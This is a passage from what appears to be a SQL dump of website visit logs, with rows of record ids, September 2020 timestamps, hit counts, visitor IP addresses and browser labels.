180.220.68','chrome'),(537297,1600025163,1,1,0,0,'173.252.111.3','other'),(537298,1600025510,1,1,0,0,'95.134.202.252','chrome'),(537299,1600026884,1,1,0,0,'37.52.20.49','chrome'),(537300,1600027568,1,1,0,0,'173.252.111.12','other'),(537301,1600028118,1,1,0,0,'91.196.178.162','chrome'),(537302,1600028581,1,1,0,0,'91.196.178.157','chrome'),(537303,1600028632,1,1,0,0,'195.114.145.131','chrome'),(537304,1600031756,1,0,1,0,'66.249.66.92',''),(537305,1600055237,1,1,0,0,'66.220.149.16','other'),(537306,1600055271,1,1,0,0,'66.220.149.5','other'),(537307,1600059624,1,1,0,0,'66.220.149.3','other'),(537308,1600062778,1,1,0,0,'37.73.174.195','chrome'),(537309,1600063784,1,1,0,0,'46.211.3.38','chrome'),(537310,1600064763,1,0,1,0,'66.249.66.91',''),(537311,1600064984,1,1,0,0,'31.13.127.1','other'),(537312,1600064985,1,1,0,0,'31.13.127.11','other'),(537313,1600065572,1,1,0,0,'91.196.178.81','chrome'),(537314,1600065594,1,1,0,0,'31.13.127.15','other'),(537315,1600065596,1,1,0,0,'31.13.127.10','other'),(537316,1600065601,2,2,0,0,'31.13.127.3','other'),(537317,1600065602,1,1,0,0,'31.13.127.9','other'),(537318,1600067397,1,1,0,0,'91.196.178.81','chrome'),(537319,1600068654,1,1,0,0,'173.252.83.120','other'),(537320,1600073080,1,1,0,0,'31.13.127.15','other'),(537321,1600073724,1,1,0,0,'173.252.87.120','other'),(537322,1600074191,1,1,0,0,'91.196.178.81','chrome'),(537323,1600074591,1,1,0,0,'37.47.33.30','chrome'),(537324,1600078052,1,1,0,0,'91.196.178.180','chrome'),(537325,1600079086,1,1,0,0,'176.124.134.111','chrome'),(537326,1600081000,1,1,0,0,'91.196.178.131','chrome'),(537327,1600081819,1,1,0,0,'173.252.107.15','other'),(537328,1600081976,1,1,0,0,'46.211.81.155','chrome'),(537329,1600087288,1,1,0,0,'173.252.111.12','other'),(537330,1600087852,1,1,0,0,'173.252.87.1','other'),(537331,1600088498,1,1,0,0,'46.211.18.223','chrome'),(537332,1600088803,1,1,0,0,'91.196.178.81','chrome'),(537333,1600089623,1,1,0,0,'91.196.178.145','chrome'),(537334,1600089935,1,1,0,0,'173.252.83.3','other'),(537335,1600090858,1,1,0,0,'91.196.178.81','chrome'),(537336,1600091196,1,1,0,0,'31.13.127.15','other'),(537337,1600091197,1,1,0,0,'31.13.127.118','other'),(537338,1600091198,1,1,0,0,'31.13.127.116','other'),(537339,1600091203,1,1,0,0,'31.13.127.8','other'),(537340,1600091209,1,1,0,0,'31.13.115.118','other'),(537341,1600091210,1,1,0,0,'31.13.127.10','other'),(537342,1600091212,1,1,0,0,'31.13.127.12','other'),(537343,1600091313,1,1,0,0,'91.196.178.105','chrome'),(537344,1600091320,1,1,0,0,'46.201.175.214','chrome'),(537345,1600091348,1,1,0,0,'128.124.99.143','chrome'),(537346,1600091357,1,1,0,0,'91.196.178.100','chrome'),(537347,1600091367,1,1,0,0,'37.73.143.121','chrome'),(537348,1600091398,1,1,0,0,'91.196.177.229','chrome'),(537349,1600091408,1,1,0,0,'46.133.217.99','chrome'),(537350,1600091412,1,1,0,0,'128.124.17.118','chrome'),(537351,1600091418,1,1,0,0,'91.196.177.176','chrome'),(537352,1600091432,1,1,0,0,'195.10.210.70','other'),(537353,1600091434,1,1,0,0,'94.153.71.145','chrome'),(537355,1600091435,1,1,0,0,'128.124.29.153','chrome'),(537356,1600091445,1,1,0,0,'188.163.33.232','chrome'),(537357,1600091454,1,1,0,0,'46.211.18.166','chrome'),(537358,1600091458,1,1,0,0,'46.211.10.117','chrome'),(537359,1600091479,1,1,0,0,'176.98.70.246','chrome'),(537360,1600091482,1,1,0,0,'37.73.102.230','chrome'),(537361,1600091487,1,1,0,0,'95.135.88.124','chrome'),(537362,1600091488,1,1,0,0,'91.196.178.171','chrome'),(537363,1600091490,1,1,0,0,'91.196.179.69','chrome'),(537364,1600091510,1,1,0,0,'128.124.64.95','chrome'),(537365,1600091527,1,1,0,0,'37.173.88.32','chrome'),(537366,1600091530,1,1,0,0,'91.196.179.134','chrome'),(537367,1600091539,1,1,0,0,'94.153.16.64','chrome'),(537368,1600091546,1,1,0,0,'91.196.177.34','chrome'),(537369,1600091574,1,1,0,0,'46.211.79.5','chrome'),(537370,1600091588,1,1,0,0,'94.153.74.96','chrome'),(537371,1600091589,1,1,0,0,'91.196.178.104','chrome'),(537372,1600091595,1,1,0,0,'80.77.33.80','chrome'),(537373,1600091609,1,1,0,0,'91.196.178.60','chrome'),(537374,1600091612,1,1,0,0,'95.133.193.195','other'),(537375,1600091649,1,1,0,0,'94.153.15.209','chrome'),(537376,1600091652,1,1,0,0,'178.133.60.230','chrome'),(537377,1600091655,1,1,0,0,'178.133.17.74','chrome'),(537378,1600091656,1,1,0,0,'91.196.178.175','chrome'),(537379,1600091687,1,1,0,0,'37.55.224.128','firefox'),(537380,1600091700,1,1,0,0,'95.158.42.26','chrome'),(537381,1600091706,1,1,0,0,'94.153.65.31','chrome'),(537382,1600091743,1,1,0,0,'37.73.204.41','chrome'),(537383,1600091752,1,1,0,0,'77.123.14.181','chrome'),(537384,1600091773,1,1,0,0,'195.10.210.70','chrome'),(537385,1600091785,1,1,0,0,'91.196.178.182','chrome'),(537386,1600091790,1,1,0,0,'92.112.124.176','chrome'),(537387,1600091852,1,1,0,0,'128.124.164.219','chrome'),(537388,1600091955,1,1,0,0,'91.196.178.125','chrome'),(537389,1600091957,2,2,0,0,'46.164.153.174','other'),(537390,1600092022,1,1,0,0,'91.196.178.121','chrome'),(537391,1600092142,1,1,0,0,'91.196.178.149','chrome'),(537392,1600092145,1,1,0,0,'94.153.50.15','chrome'),(537393,1600092223,1,1,0,0,'178.133.117.60','chrome'),(537394,1600092268,1,1,0,0,'130.180.210.249','chrome'),(537395,1600092319,1,1,0,0,'91.196.178.169','chrome'),(537396,1600092335,1,1,0,0,'94.153.64.95','chrome'),(537397,1600092337,1,1,0,0,'31.172.136.81','chrome'),(537398,1600092418,1,1,0,0,'91.196.178.17','chrome'),(537399,1600092425,1,1,0,0,'91.196.178.77','chrome'),(537400,1600092427,1,1,0,0,'91.196.178.81','chrome'),(537401,1600092555,1,1,0,0,'91.196.178.102','other'),(537402,1600092606,1,1,0,0,'91.196.179.65','chrome'),(537403,1600092769,1,1,0,0,'94.153.4.162','chrome'),(537404,1600092782,1,1,0,0,'88.155.93.241','chrome'),(537405,1600092831,1,1,0,0,'46.211.72.84','chrome'),(537406,1600092855,1,1,0,0,'173.252.111.2','other'),(537407,1600092863,1,1,0,0,'91.196.177.176','chrome'),(537408,1600092885,1,1,0,0,'91.196.179.134','chrome'),(537409,1600092934,1,1,0,0,'37.73.173.143','chrome'),(537410,1600092947,1,1,0,0,'185.234.67.21','chrome'),(537411,1600092949,1,1,0,0,'178.133.17.173','chrome'),(537412,1600093052,1,1,0,0,'94.153.7.115','other'),(537413,1600093053,1,1,0,0,'31.13.103.10','other'),(537414,1600093384,1,1,0,0,'91.196.178.122','other'),(537415,1600093393,1,1,0,0,'46.164.155.115','chrome'),(537416,1600093496,1,1,0,0,'69.171.251.3','other'),(537417,1600093531,1,1,0,0,'128.124.232.255','chrome'),(537418,1600093700,1,1,0,0,'193.108.51.35','chrome'),(537419,1600093707,1,1,0,0,'88.155.108.163','chrome'),(537420,1600093768,1,1,0,0,'91.196.178.2','chrome'),(537421,1600094032,1,1,0,0,'91.196.177.26','chrome'),(537422,1600094116,1,1,0,0,'88.155.167.4','chrome'),(537423,1600094211,1,1,0,0,'178.133.41.93','chrome'),(537424,1600094213,1,1,0,0,'91.196.177.84','chrome'),(537425,1600094235,1,1,0,0,'91.124.181.251','chrome'),(537426,1600094365,5,5,0,0,'46.164.153.174','other'),(537427,1600094436,1,1,0,0,'37.73.181.173','chrome'),(537428,1600094517,1,1,0,0,'46.211.12.219','chrome'),(537429,1600094616,1,1,0,0,'46.201.135.253','chrome'),(537430,1600094840,1,1,0,0,'46.211.78.180','chrome'),(537431,1600094848,1,1,0,0,'176.37.43.100','chrome'),(537432,1600094960,1,1,0,0,'77.75.147.133','chrome'),(537433,1600094983,1,1,0,0,'31.13.127.111','other'),(537434,1600094992,1,1,0,0,'93.73.76.111','chrome'),(537435,1600095121,2,2,0,0,'31.13.127.16','other'),(537436,1600095159,1,1,0,0,'188.163.82.234','chrome'),(537437,1600095163,1,1,0,0,'91.196.178.71','chrome'),(537438,1600095249,1,1,0,0,'91.196.178.2','chrome'),(537439,1600095392,1,1,0,0,'195.10.210.70','chrome'),(537440,1600095464,1,1,0,0,'46.211.33.208','other'),(537441,1600095465,1,1,0,0,'185.138.231.196','chrome'),(537442,1600095494,1,1,0,0,'46.133.190.182','chrome'),(537443,1600095530,1,1,0,0,'91.196.178.179','chrome'),(537444,1600095612,1,1,0,0,'94.153.20.26','chrome'),(537445,1600095932,1,1,0,0,'91.196.178.57','chrome'),(537446,1600095993,1,1,0,0,'37.73.9.183','chrome'),(537447,1600096069,1,1,0,0,'178.133.172.181','chrome'),(537448,1600096132,1,1,0,0,'31.13.127.120','other'),(537449,1600096134,1,1,0,0,'31.13.127.23','other'),(537450,1600096160,1,1,0,0,'46.211.44.221','chrome'),(537451,1600096208,1,1,0,0,'91.196.178.2','chrome'),(537452,1600096309,1,1,0,0,'83.20.228.130','chrome'),(537453,1600096333,1,1,0,0,'37.73.107.19','chrome'),(537454,1600096513,1,1,0,0,'46.211.51.5','chrome'),(537455,1600096546,1,1,0,0,'37.55.226.3','chrome'),(537456,1600096560,1,1,0,0,'91.196.178.171','other'),(537457,1600096612,1,1,0,0,'46.211.34.112','chrome'),(537458,1600096731,1,1,0,0,'31.13.127.9','other'),(537459,1600096733,1,1,0,0,'128.124.203.137','other'),(537460,1600096932,1,1,0,0,'91.196.178.103','chrome'),(537461,1600097020,1,1,0,0,'91.196.178.143','chrome'),(537462,1600097107,1,1,0,0,'46.211.21.239','chrome'),(537463,1600097315,1,1,0,0,'94.153.64.74','chrome'),(537464,1600097368,1,1,0,0,'91.196.178.182','chrome'),(537465,1600097415,1,1,0,0,'91.196.178.183','chrome'),(537466,1600097692,1,1,0,0,'91.196.178.167','chrome'),(537467,1600097757,1,1,0,0,'91.196.178.74','chrome'),(537468,1600098012,1,1,0,0,'46.211.77.228','chrome'),(537469,1600098032,1,1,0,0,'178.92.75.41','chrome'),(537470,1600098092,1,1,0,0,'91.196.178.122','chrome'),(537471,1600098107,1,1,0,0,'37.248.210.15','chrome'),(537472,1600098233,1,1,0,0,'77.75.150.132','chrome'),(537473,1600098299,1,1,0,0,'91.196.178.43','chrome'),(537474,1600098465,1,1,0,0,'46.211.40.104','chrome'),(537475,1600098544,1,1,0,0,'37.73.87.38','chrome'),(537476,1600098601,1,1,0,0,'91.196.178.2','chrome'),(537477,1600098624,1,1,0,0,'91.196.178.9','chrome'),(537478,1600098653,1,1,0,0,'91.196.178.186','chrome'),(537479,1600098800,1,1,0,0,'46.63.121.200','chrome'),(537480,1600098819,1,1,0,0,'94.153.49.110','chrome'),(537481,1600098862,1,1,0,0,'188.163.120.119','chrome'),(537482,1600099153,1,1,0,0,'91.124.181.119','chrome'),(537483,1600099206,1,1,0,0,'91.196.178.173','chrome'),(537484,1600099244,1,1,0,0,'91.196.178.44','other'),(537485,1600099345,1,1,0,0,'37.73.92.87','chrome'),(537486,1600099444,1,1,0,0,'91.196.178.176','chrome'),(537487,1600099464,1,1,0,0,'91.196.178.121','chrome'),(537488,1600099756,1,1,0,0,'94.179.208.219','chrome'),(537489,1600100251,1,1,0,0,'95.132.46.150','other'),(537490,1600100298,1,1,0,0,'46.211.57.29','chrome'),(537491,1600100314,1,1,0,0,'91.196.177.163','chrome'),(537492,1600100672,1,1,0,0,'93.73.148.158','chrome'),(537493,1600100709,1,1,0,0,'91.196.178.2','chrome'),(537494,1600101028,1,1,0,0,'185.234.67.1','chrome'),(537495,1600101270,1,1,0,0,'91.196.178.53','chrome'),(537496,1600101593,2,2,0,0,'91.196.178.189','chrome'),(537497,1600101672,1,1,0,0,'128.124.165.69','chrome'),(537498,1600101890,1,1,0,0,'91.196.178.93','chrome'),(537499,1600101962,1,1,0,0,'91.196.178.169','chrome'),(537500,1600102087,1,1,0,0,'94.153.1.34','chrome'),(537501,1600102194,1,1,0,0,'178.133.96.64','chrome'),(537502,1600102222,1,1,0,0,'91.196.178.43','chrome'),(537503,1600102945,1,1,0,0,'37.73.178.242','chrome'),(537504,1600103012,1,1,0,0,'178.133.201.252','chrome'),(537505,1600103090,1,1,0,0,'173.252.87.16','other'),(537506,1600103250,2,2,0,0,'91.196.178.2','chrome'),(537507,1600103282,1,1,0,0,'91.196.178.21','chrome'),(537508,1600103327,1,1,0,0,'31.13.103.119','other'),(537509,1600103402,1,1,0,0,'46.211.71.248','chrome'),(537510,1600103460,1,1,0,0,'173.252.83.3','other'),(537511,1600103541,1,1,0,0,'91.210.251.68','chrome'),(537512,1600104105,1,1,0,0,'46.23.62.21','other'),(537513,1600104412,1,1,0,0,'37.54.20.16','chrome'),(537514,1600104696,1,1,0,0,'69.171.251.7','other'),(537516,1600104697,1,1,0,0,'66.220.149.27','other'),(537517,1600104895,1,1,0,0,'91.196.178.174','chrome'),(537518,1600105118,1,1,0,0,'91.196.177.23','chrome'),(537519,1600105310,2,2,0,0,'91.196.178.2','chrome'),(537520,1600105626,1,1,0,0,'91.196.178.84','chrome'),(537521,1600105674,1,1,0,0,'46.211.60.191','chrome'),(537522,1600105721,1,1,0,0,'91.196.178.177','other'),(537523,1600105966,1,1,0,0,'46.211.41.63','chrome'),(537524,1600105978,1,1,0,0,'195.10.210.70','other'),(537525,1600106087,1,1,0,0,'91.196.178.75','chrome'),(537526,1600106220,1,1,0,0,'74.125.210.44','chrome'),(537527,1600106226,1,1,0,0,'130.180.216.197','chrome'),(537528,1600106262,1,1,0,0,'195.149.108.43','other'),(537529,1600106381,1,1,0,0,'91.196.178.51','chrome'),(537530,1600106477,1,1,0,0,'91.196.178.166','chrome'),(537531,1600106491,1,1,0,0,'91.196.178.42','chrome'),(537532,1600106577,1,1,0,0,'46.133.61.171','chrome'),(537533,1600106598,1,1,0,0,'91.196.178.180','chrome'),(537534,1600106662,1,1,0,0,'185.234.67.14','chrome'),(537535,1600106752,1,1,0,0,'91.196.178.157','chrome'),(537536,1600107136,1,1,0,0,'91.196.178.153','chrome'),(537537,1600107379,1,1,0,0,'195.177.124.227','chrome'),(537538,1600107385,1,1,0,0,'46.133.97.185','chrome'),(537539,1600107433,2,2,0,0,'91.196.178.2','chrome'),(537540,1600107742,1,1,0,0,'91.196.178.187','chrome'),(537541,1600107781,1,1,0,0,'188.163.72.111','chrome'),(537542,1600107850,1,1,0,0,'173.252.111.3','other'),(537543,1600107852,2,2,0,0,'173.252.111.14','other'),(537544,1600107857,2,2,0,0,'173.252.111.112','other'),(537545,1600108031,1,1,0,0,'37.73.167.68','chrome'),(537546,1600108445,2,2,0,0,'91.196.178.2','chrome'),(537547,1600108626,1,1,0,0,'91.196.178.170','other'),(537548,1600108687,1,1,0,0,'195.162.71.245','chrome'),(537549,1600109012,1,1,0,0,'95.132.15.184','chrome'),(537550,1600109019,1,1,0,0,'37.73.27.41','chrome'),(537551,1600109058,2,2,0,0,'91.196.177.10','firefox'),(537552,1600109109,1,1,0,0,'91.196.179.33','chrome'),(537553,1600109228,1,1,0,0,'69.171.251.14','other'),(537554,1600109288,1,1,0,0,'46.211.25.83','chrome'),(537555,1600109639,1,1,0,0,'92.113.75.109','chrome'),(537556,1600109704,1,1,0,0,'167.172.183.11','chrome'),(537557,1600109804,1,1,0,0,'91.196.178.52','chrome'),(537558,1600109980,1,1,0,0,'91.196.178.44','other'),(537559,1600109997,1,1,0,0,'91.196.178.2','chrome'),(537560,1600110202,1,1,0,0,'91.196.178.101','chrome'),(537561,1600110205,1,1,0,0,'109.185.119.137','chrome'),(537562,1600110265,1,1,0,0,'91.196.178.93','chrome'),(537563,1600110557,1,1,0,0,'91.196.178.185','chrome'),(537564,1600111091,1,1,0,0,'37.73.220.54','chrome'),(537565,1600111205,1,1,0,0,'46.211.64.68','chrome'),(537566,1600111765,1,1,0,0,'37.73.85.82','chrome'),(537567,1600111769,1,1,0,0,'46.211.68.35','chrome'),(537568,1600111845,1,1,0,0,'91.196.178.77','chrome'),(537569,1600111935,1,1,0,0,'91.196.178.16','chrome'),(537570,1600112179,1,1,0,0,'91.196.178.37','chrome'),(537571,1600112319,1,1,0,0,'91.196.178.134','chrome'),(537572,1600112336,1,1,0,0,'85.163.87.93','chrome'),(537573,1600112363,1,1,0,0,'185.234.67.4','chrome'),(537574,1600112409,1,1,0,0,'37.53.228.78','chrome'),(537575,1600112494,1,1,0,0,'91.196.178.182','chrome'),(537576,1600112498,1,1,0,0,'130.180.209.191','chrome'),(537577,1600112913,1,1,0,0,'94.153.28.79','chrome'),(537578,1600113023,1,1,0,0,'37.73.90.211','other'),(537579,1600113190,1,1,0,0,'185.234.67.7','firefox'),(537580,1600113240,1,1,0,0,'151.68.133.91','chrome'),(537581,1600113297,1,1,0,0,'173.252.111.4','other'),(537582,1600113298,2,2,0,0,'173.252.111.119','other'),(537583,1600113315,1,1,0,0,'173.252.111.20','other'),(537584,1600113629,1,1,0,0,'91.196.178.16','chrome'),(537585,1600113851,1,1,0,0,'188.163.19.91','chrome'),(537586,1600113882,1,1,0,0,'185.8.41.69','other'),(537587,1600113932,1,1,0,0,'91.196.178.86','chrome'),(537588,1600114066,1,1,0,0,'91.196.178.43','chrome'),(537589,1600114182,1,1,0,0,'91.196.178.39','chrome'),(537590,1600114559,1,1,0,0,'91.196.178.16','chrome'),(537591,1600115437,1,1,0,0,'94.153.20.254','chrome'),(537592,1600115438,1,1,0,0,'37.53.122.80','chrome'),(537593,1600115974,1,1,0,0,'91.196.178.186','chrome'),(537594,1600116133,1,1,0,0,'91.196.178.124','chrome'),(537595,1600116157,1,1,0,0,'91.196.178.61','other'),(537596,1600117174,1,1,0,0,'46.211.45.168','chrome'),(537597,1600117253,1,1,0,0,'94.153.2.186','chrome'),(537598,1600117577,1,1,0,0,'195.10.210.70','chrome'),(537599,1600118077,1,1,0,0,'173.252.83.112','other'),(537600,1600118078,1,1,0,0,'173.252.83.11','other'),(537602,1600118079,1,1,0,0,'173.252.83.4','other'),(537603,1600118107,1,1,0,0,'128.124.4.203','chrome'),(537604,1600118582,1,1,0,0,'173.252.127.15','other'),(537605,1600118882,1,0,1,0,'66.249.66.92',''),(537606,1600121182,1,1,0,0,'185.234.67.30','other'),(537607,1600121442,1,1,0,0,'192.38.140.8','chrome'),(537608,1600121645,1,1,0,0,'173.252.111.15','other'),(537609,1600121646,1,1,0,0,'173.252.111.18','other'),(537614,1600122866,1,1,0,0,'173.252.127.9','other'),(537615,1600123183,1,1,0,0,'91.196.178.130','chrome'),(537616,1600125309,1,1,0,0,'94.153.15.218','chrome'),(537617,1600128489,80,80,0,0,'5.255.253.87','other'),(537618,1600128631,4,4,0,0,'178.154.200.42','chrome'),(537619,1600128633,1,1,0,0,'178.133.126.89','chrome'),(537620,1600128647,36,36,0,0,'5.45.207.133','other'),(537621,1600128649,42,42,0,0,'178.154.200.42','other'),(537622,1600128676,1,1,0,0,'5.45.207.133','chrome'),(537623,1600128677,2,2,0,0,'213.180.203.178','other'),(537624,1600128681,3,3,0,0,'213.180.203.253','other'),(537625,1600128703,197,197,0,0,'5.255.253.92','other'),(537626,1600128706,1,1,0,0,'5.45.207.140','other'),(537628,1600128708,1,1,0,0,'213.180.203.75','other'),(537629,1600128710,1,1,0,0,'5.255.253.167','other'),(537630,1600128711,1,1,0,0,'5.45.207.92','other'),(537631,1600128716,12,12,0,0,'213.180.203.40','other'),(537632,1600128730,1,1,0,0,'5.255.253.111','other'),(537633,1600128830,60,60,0,0,'5.45.207.123','other'),(537634,1600128847,32,32,0,0,'213.180.203.111','other'),(537635,1600128867,1,1,0,0,'178.154.200.111','other'),(537636,1600128870,7,7,0,0,'213.180.203.105','other'),(537638,1600128873,10,10,0,0,'5.45.207.159','other'),(537639,1600128885,1,1,0,0,'5.45.207.105','other'),(537640,1600128897,1,1,0,0,'5.45.207.159','chrome'),(537641,1600128932,1,1,0,0,'213.180.203.105','chrome'),(537642,1600128938,1,1,0,0,'5.45.207.123','chrome'),(537643,1600128940,1,1,0,0,'213.180.203.111','chrome'),(537644,1600128949,15,15,0,0,'178.154.200.133','other'),(537645,1600129009,1,1,0,0,'178.154.200.133','chrome'),(537646,1600129325,2,2,0,0,'5.255.253.81','other'),(537647,1600129417,8,8,0,0,'5.255.253.87','other'),(537648,1600129608,4,4,0,0,'5.255.253.92','other'),(537649,1600134775,1,1,0,0,'31.13.115.13','other'),(537650,1600136592,1,1,0,0,'91.196.178.2','chrome'),(537651,1600140146,1,1,0,0,'213.166.65.252','chrome'),(537652,1600140606,1,1,0,0,'178.92.85.100','chrome'),(537653,1600140631,1,1,0,0,'173.252.107.12','other'),(537654,1600141942,1,1,0,0,'178.133.152.235','chrome'),(537655,1600142790,1,1,0,0,'91.196.121.134','chrome'),(537656,1600143560,1,1,0,0,'91.196.178.124','chrome'),(537657,1600143792,1,1,0,0,'173.252.111.113','other'),(537658,1600144105,1,1,0,0,'185.234.67.17','chrome'),(537659,1600144208,1,1,0,0,'69.171.251.120','other'),(537660,1600144423,2,2,0,0,'173.206.157.241','firefox'),(537661,1600146237,1,1,0,0,'128.124.248.52','chrome'),(537662,1600146308,1,1,0,0,'46.211.13.214','chrome'),(537663,1600146858,1,1,0,0,'46.23.54.84','chrome'),(537664,1600147036,1,1,0,0,'91.196.178.66','chrome'),(537665,1600147201,1,1,0,0,'91.196.178.93','chrome'),(537666,1600147382,1,1,0,0,'46.211.64.158','chrome'),(537667,1600147914,1,1,0,0,'91.196.178.81','chrome'),(537668,1600147963,1,1,0,0,'173.252.107.14','other'),(537669,1600148331,1,1,0,0,'91.196.178.120','chrome'),(537670,1600148402,1,1,0,0,'62.80.167.253','chrome'),(537671,1600148861,1,1,0,0,'195.10.210.70','other'),(537672,1600149427,1,1,0,0,'91.196.178.81','chrome'),(537673,1600149539,1,1,0,0,'46.133.107.202','chrome'),(537674,1600149769,1,1,0,0,'37.73.213.25','chrome'),(537675,1600150486,1,1,0,0,'128.124.221.254','chrome'),(537676,1600150997,1,1,0,0,'94.153.26.222','chrome'),(537677,1600151774,1,1,0,0,'91.196.178.170','chrome'),(537678,1600152496,1,0,1,0,'66.249.66.92',''),(537679,1600152849,1,1,0,0,'94.153.5.191','chrome'),(537680,1600152857,1,1,0,0,'94.153.31.111','chrome'),(537681,1600153135,1,1,0,0,'78.154.179.193','other'),(537682,1600153152,1,1,0,0,'173.252.111.120','other'),(537683,1600154084,1,1,0,0,'91.196.178.148','chrome'),(537684,1600154107,1,1,0,0,'91.196.178.81','chrome'),(537685,1600154215,1,1,0,0,'91.196.178.26','chrome'),(537686,1600154867,1,1,0,0,'195.10.210.49','chrome'),(537687,1600155069,1,1,0,0,'91.196.178.81','chrome'),(537688,1600156343,1,1,0,0,'91.196.178.171','chrome'),(537689,1600156884,1,1,0,0,'91.196.178.146','other'),(537690,1600157654,2,2,0,0,'91.196.178.148','chrome'),(537691,1600158035,1,1,0,0,'66.220.149.29','other'),(537692,1600158144,1,1,0,0,'46.211.65.80','chrome'),(537693,1600158188,1,1,0,0,'31.13.127.8','other'),(537694,1600159104,3,3,0,0,'91.196.177.46','firefox'),(537695,1600159197,1,1,0,0,'173.252.87.22','other'),(537696,1600159403,1,1,0,0,'91.196.178.81','chrome'),(537697,1600159416,1,1,0,0,'128.124.229.67','chrome'),(537698,1600160253,1,1,0,0,'37.73.204.87','chrome'),(537699,1600161392,1,1,0,0,'178.94.172.130','chrome'),(537700,1600161672,1,1,0,0,'91.196.178.58','chrome'),(537701,1600162185,1,1,0,0,'91.196.178.81','chrome'),(537702,1600162245,1,1,0,0,'173.252.127.12','other'),(537703,1600163196,1,1,0,0,'91.196.178.81','chrome'),(537704,1600163897,1,1,0,0,'94.153.26.0','chrome'),(537705,1600164483,1,1,0,0,'31.40.147.244','chrome'),(537706,1600164532,1,1,0,0,'94.153.23.100','chrome'),(537707,1600165983,1,1,0,0,'91.196.178.175','chrome'),(537708,1600166207,1,1,0,0,'94.153.3.25','chrome'),(537709,1600169453,1,1,0,0,'91.196.178.8','chrome'),(537710,1600169941,1,1,0,0,'212.113.52.165','chrome'),(537711,1600170579,1,1,0,0,'46.211.0.63','chrome'),(537712,1600170657,1,1,0,0,'91.196.178.181','chrome'),(537713,1600170669,1,1,0,0,'91.196.177.104','chrome'),(537714,1600171430,1,1,0,0,'91.196.178.16','chrome'),(537715,1600171546,1,1,0,0,'173.252.95.36','other'),(537716,1600171780,1,1,0,0,'94.179.208.131','chrome'),(537717,1600172367,2,2,0,0,'91.196.178.16','chrome'),(537718,1600173159,1,1,0,0,'94.153.73.93','chrome'),(537719,1600174663,1,1,0,0,'91.196.178.16','chrome'),(537720,1600175306,1,1,0,0,'173.252.107.118','other'),(537721,1600175739,1,1,0,0,'91.196.178.81','chrome'),(537722,1600175941,1,1,0,0,'31.13.127.14','other'),(537723,1600175942,3,3,0,0,'31.13.127.116','other'),(537724,1600175943,3,3,0,0,'31.13.127.11','other'),(537725,1600175944,1,1,0,0,'31.13.127.8','other'),(537727,1600175948,1,1,0,0,'31.13.127.2','other'),(537728,1600176056,1,1,0,0,'31.13.127.6','other'),(537730,1600176057,1,1,0,0,'31.13.127.4','other'),(537731,1600176059,1,1,0,0,'31.13.127.13','other'),(537732,1600176363,1,1,0,0,'37.53.122.198','chrome'),(537733,1600176386,1,1,0,0,'173.252.95.41','other'),(537734,1600177091,1,1,0,0,'178.133.36.141','chrome'),(537735,1600177550,1,1,0,0,'195.114.145.30','chrome'),(537736,1600177825,1,1,0,0,'37.53.122.80','chrome'),(537737,1600178143,1,1,0,0,'95.132.46.150','other'),(537738,1600179182,1,1,0,0,'173.252.83.4','other'),(537739,1600179470,1,1,0,0,'95.132.14.156','chrome'),(537740,1600181326,1,1,0,0,'31.13.127.23','other'),(537741,1600181554,1,1,0,0,'37.53.122.80','chrome'),(537742,1600183354,1,1,0,0,'46.211.66.127','chrome'),(537743,1600183461,1,1,0,0,'46.211.52.216','chrome'),(537744,1600185209,1,1,0,0,'91.196.178.2','chrome'),(537745,1600185969,1,1,0,0,'128.124.141.203','chrome'),(537746,1600186384,1,1,0,0,'46.201.123.5','chrome'),(537747,1600186443,1,1,0,0,'69.171.251.30','other'),(537748,1600186642,1,1,0,0,'94.153.16.103','chrome'),(537749,1600186987,1,1,0,0,'95.132.13.56','other'),(537750,1600188284,1,1,0,0,'173.252.95.17','other'),(537751,1600188285,1,1,0,0,'173.252.111.19','other'),(537752,1600188286,1,1,0,0,'173.252.95.35','other'),(537754,1600189060,1,1,0,0,'185.215.53.57','chrome'),(537755,1600189277,1,1,0,0,'88.155.133.101','other'),(537756,1600189364,1,1,0,0,'91.196.178.111','chrome'),(537757,1600190500,1,1,0,0,'91.196.178.2','chrome'),(537758,1600190554,1,1,0,0,'69.171.249.18','other'),(537759,1600190663,1,1,0,0,'91.196.178.112','chrome'),(537760,1600191873,1,1,0,0,'37.229.113.22','chrome'),(537761,1600192747,1,1,0,0,'91.196.178.89','chrome'),(537762,1600192770,1,1,0,0,'173.252.95.39','other'),(537763,1600192771,1,1,0,0,'173.252.95.8','other'),(537764,1600193000,1,1,0,0,'91.196.178.2','chrome'),(537765,1600193259,1,1,0,0,'94.153.66.231','chrome'),(537766,1600193319,1,1,0,0,'46.211.47.75','chrome'),(537767,1600193846,1,1,0,0,'91.196.178.28','chrome'),(537768,1600194009,1,1,0,0,'94.153.74.125','chrome'),(537769,1600194564,2,2,0,0,'91.196.178.2','chrome'),(537770,1600194595,2,2,0,0,'173.252.111.10','other'),(537771,1600194596,1,1,0,0,'173.252.111.16','other'),(537772,1600194597,1,1,0,0,'69.171.251.20','other'),(537773,1600194598,2,2,0,0,'69.171.251.34','other'),(537776,1600194599,1,1,0,0,'173.252.111.119','other'),(537777,1600194605,1,1,0,0,'173.252.111.2','other'),(537781,1600194606,1,1,0,0,'173.252.127.38','other'),(537784,1600194609,2,2,0,0,'31.13.127.17','other'),(537786,1600194613,1,1,0,0,'31.13.127.13','other'),(537787,1600194617,2,2,0,0,'173.252.95.37','other'),(537788,1600194622,1,1,0,0,'66.220.149.32','other'),(537789,1600194630,1,1,0,0,'91.196.178.42','chrome'),(537790,1600194633,1,1,0,0,'173.252.95.19','other'),(537791,1600194634,1,1,0,0,'66.220.149.19','other'),(537792,1600194639,1,1,0,0,'31.13.127.20','other'),(537793,1600194640,1,1,0,0,'94.153.31.112','chrome'),(537794,1600194644,2,2,0,0,'173.252.111.23','other'),(537796,1600194645,1,1,0,0,'95.132.58.179','chrome'),(537797,1600194653,1,1,0,0,'173.252.95.116','other'),(537798,1600194655,2,2,0,0,'66.220.149.20','other'),(537799,1600194657,1,1,0,0,'173.252.95.6','other'),(537800,1600194658,2,2,0,0,'173.252.127.25','other'),(537801,1600194660,1,1,0,0,'173.252.127.6','other'),(537802,1600194663,1,1,0,0,'173.252.95.36','other'),(537803,1600194666,1,1,0,0,'173.252.95.12','other'),(537804,1600194673,1,1,0,0,'173.252.111.15','other'),(537807,1600194676,1,1,0,0,'91.196.178.92','chrome'),(537808,1600194680,2,2,0,0,'173.252.95.33','other'),(537809,1600194684,1,1,0,0,'69.171.251.36','other'),(537810,1600194694,1,1,0,0,'173.252.127.7','other'),(537811,1600194704,1,1,0,0,'66.220.149.120','other'),(537812,1600194709,2,2,0,0,'173.252.127.118','other'),(537813,1600194718,2,2,0,0,'31.13.127.16','other'),(537814,1600194734,